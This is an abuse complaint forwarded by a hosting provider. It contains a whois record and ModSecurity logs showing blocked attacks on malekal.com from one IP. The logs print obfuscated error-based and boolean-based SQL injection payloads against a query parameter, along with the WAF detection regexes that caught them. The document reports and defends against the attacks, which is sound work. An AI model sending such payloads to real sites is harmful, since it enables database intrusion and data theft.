We have received the abuse complaint regarding to the ATTACK. Please check it

1.  
2. We have received the abuse complaint regarding to the ATTACK. Please check it and take necessary actions on it.
3.  
4. Thanks.
5.  
6. ==========================================================
7.  
8. ed e-mail to inform you of an abuse complaint **
9.  
10. ABUSE TYPE: ATTACK
11.  
12. IP: 85.17.73.12
13.  
14.  
15. Dear customer,
16.  
17. This message is to inform you we received a complaint regarding
18. an IP assigned to you. Please see the complaint at the bottom
19. of this e-mail. We urge you to take appropriate action to prevent
20. future complaints.
21.  
22. Please note: the complaint has been processed by an automated system.
23. If you feel the complaint is invalid, please contact the complainant.
24.  
25. Failure to take action might result in an IP block of the mentioned IP.
26.  
27. Kind regards,
28.  
29. LeaseWeb Netherlands B.V. - Abuse Desk
30.  
31.  
32. ***** ADDITIONAL INFORMATION BY SIRT *****
33. ******************************************
34. ORIGINAL COMPLAINT BELOW
35. ******************************************
36.  
37. Hello,
38. This is an automatically generated email,
39.  
40. === Fri, 29 May 2015 20:38:50 +0200
41. 9 attacks from 85.17.73.12 has been detected against malekal.com (94.23.44.69)
42. More abuses for WYCT at : http://www.malekal.com/modsec/index.php?netname=WYCT
43. abuse mail : abuse@leaseweb.com
44. ===
45.  
46. % This is the RIPE Database query service.
47. % The objects are in RPSL format.
48. %
49. % The RIPE Database is subject to Terms and Conditions.
50. % See http://www.ripe.net/db/support/db-terms-conditions.pdf
51.  
52. % Note: this output has been filtered.
53. % To receive output for a database update, use the "-B" flag.
54.  
55. % Information related to '85.17.73.0 - 85.17.73.63'
56.  
57. % Abuse contact for '85.17.73.0 - 85.17.73.63' is 'abuse@leaseweb.com'
58.  
59. inetnum: 85.17.73.0 - 85.17.73.63
60. netname: WYCT
61. descr: Aysima 1-10-2009
62. remarks: Please send email to "abuse@leaseweb.com" for complaints
63. remarks: regarding portscans, DoS attacks and spam.
64. country: NL
65. admin-c: LSW1-RIPE
66. tech-c: LSW1-RIPE
67. status: ASSIGNED PA
68. mnt-by: OCOM-MNT
69. created: 2011-11-01T11:27:42Z
70. last-modified: 2011-11-01T11:27:42Z
71. source: RIPE # Filtered
72.  
73. person: RIP Mean
74. address: P.O. Box 93054
75. address: 1090BB AMSTERDAM
76. address: Netherlands
77. phone: +31 20 3162880
78. fax-no: +31 20 3162890
79. abuse-mailbox: abuse@nl.leaseweb.com
80. nic-hdl: LSW1-RIPE
81. mnt-by: OCOM-MNT
82. created: 2005-06-07T14:36:03Z
83. last-modified: 2015-03-24T09:01:24Z
84. source: RIPE # Filtered
85.  
86. % Information related to '85.17.0.0/16AS16265'
87.  
88. route: 85.17.0.0/16
89. descr: LEASEWEB
90. origin: AS16265
91. remarks: LeaseWeb
92. mnt-by: OCOM-MNT
93. created: 2005-03-12T22:19:17Z
94. last-modified: 2007-07-10T14:06:02Z
95. source: RIPE # Filtered
96.  
97. % Information related to '85.17.0.0/16AS60781'
98.  
99. route: 85.17.0.0/16
100. descr: LEASEWEB
101. origin: AS60781
102. remarks: LeaseWeb
103. mnt-by: OCOM-MNT
104. created: 2014-03-11T15:21:15Z
105. last-modified: 2014-03-11T15:21:15Z
106. source: RIPE # Filtered
107.  
108. % This query was served by the RIPE Database Query Service version 1.79.2 (DB-4)
109.  
110.  
111.  
112.  
113. Some logs for 85.17.73.12
114. ========================================
115. Matched Transaction for Search String (85.17.73.12)
116. ========================================
117.  
118. ========================================
119. Matched Transaction for Search String (29/May/2015)
120. ========================================
121.  
122. --838f666c-A--
123. [29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK4AAAAB 94.23.44.69 7399 94.23.44.69 8080
124. --838f666c-B--
125. POST /modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a) HTTP/1.1
126. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
127. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
128. Referer: http://www.malekal.com/modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)
129. Content-Type: application/x-www-form-urlencoded
130. Host: www.malekal.com
131. Content-Length: 0
132. X-Forwarded-For: 85.17.73.12
133. Accept-Encoding: gzip
134. X-Varnish: 2014342074
135.  
136. --838f666c-C--
137.  
138. --838f666c-F--
139. HTTP/1.1 403 Forbidden
140. Vary: Accept-Encoding
141. Content-Encoding: gzip
142. Content-Length: 186
143. Content-Type: text/html; charset=iso-8859-1
144.  
145. --838f666c-E--
146. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
147. <html><head>
148. <title>403 Forbidden</title>
149. </head><body>
150. <h1>Forbidden</h1>
151. <p>You don't have permission to access /modsec/index.php
152. on this server.</p>
153. </body></html>
154.  
155. --838f666c-H--
156. Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\A|[^\\d])0x[a-f\\d]{3,}[a-f\\d]*)+" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21 found within ARGS:ip: (/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
157. Action: Intercepted (phase 2)
158. Apache-Handler: application/x-httpd-php
159. Stopwatch: 1432924493439313 2606 (- - -)
160. Stopwatch2: 1432924493439313 2606; combined=515, p1=131, p2=185, p3=0, p4=0, p5=169, sr=29, sw=30, l=0, gc=0
161. Response-Body-Transformed: Dechunked
162. Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
163. Server: Apache/2.2.22
164.  
165. --838f666c-Z--
166.  
167. ========================================
168. Matched Transaction for Search String (85.17.73.12)
169. ========================================
170.  
171. ========================================
172. Matched Transaction for Search String (29/May/2015)
173. ========================================
174.  
175. --838f666c-A--
176. [29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK8AAAAB 94.23.44.69 7399 94.23.44.69 8080
177. --838f666c-B--
178. POST /modsec/index.php?ip='0=A+and+1=1 HTTP/1.1
179. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
180. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
181. Referer: http://www.malekal.com/modsec/index.php?ip='0=A+and+1=1
182. Content-Type: application/x-www-form-urlencoded
183. Host: www.malekal.com
184. Content-Length: 0
185. X-Forwarded-For: 85.17.73.12
186. Accept-Encoding: gzip
187. X-Varnish: 2014342075
188.  
189. --838f666c-C--
190.  
191. --838f666c-F--
192. HTTP/1.1 403 Forbidden
193. Vary: Accept-Encoding
194. Content-Encoding: gzip
195. Content-Length: 186
196. Content-Type: text/html; charset=iso-8859-1
197.  
198. --838f666c-E--
199. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
200. <html><head>
201. <title>403 Forbidden</title>
202. </head><body>
203. <h1>Forbidden</h1>
204. <p>You don't have permission to access /modsec/index.php
205. on this server.</p>
206. </body></html>
207.  
208. --838f666c-H--
209. Message: Access denied with code 403 (phase 2). Pattern match "(?i)\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=]|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[<>]|\\band\\b ?(?:\\d{1,10}|[\\'\"][^=]{1,10}[\\'\"]) ?[=<>]+|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: and 1= found within ARGS:ip: '0=A and 1=1"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
210. Action: Intercepted (phase 2)
211. Apache-Handler: application/x-httpd-php
212. Stopwatch: 1432924493554446 2160 (- - -)
213. Stopwatch2: 1432924493554446 2160; combined=381, p1=120, p2=112, p3=0, p4=0, p5=113, sr=30, sw=36, l=0, gc=0
214. Response-Body-Transformed: Dechunked
215. Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
216. Server: Apache/2.2.22
217.  
218. --838f666c-Z--
219.  
220. ========================================
221. Matched Transaction for Search String (85.17.73.12)
222. ========================================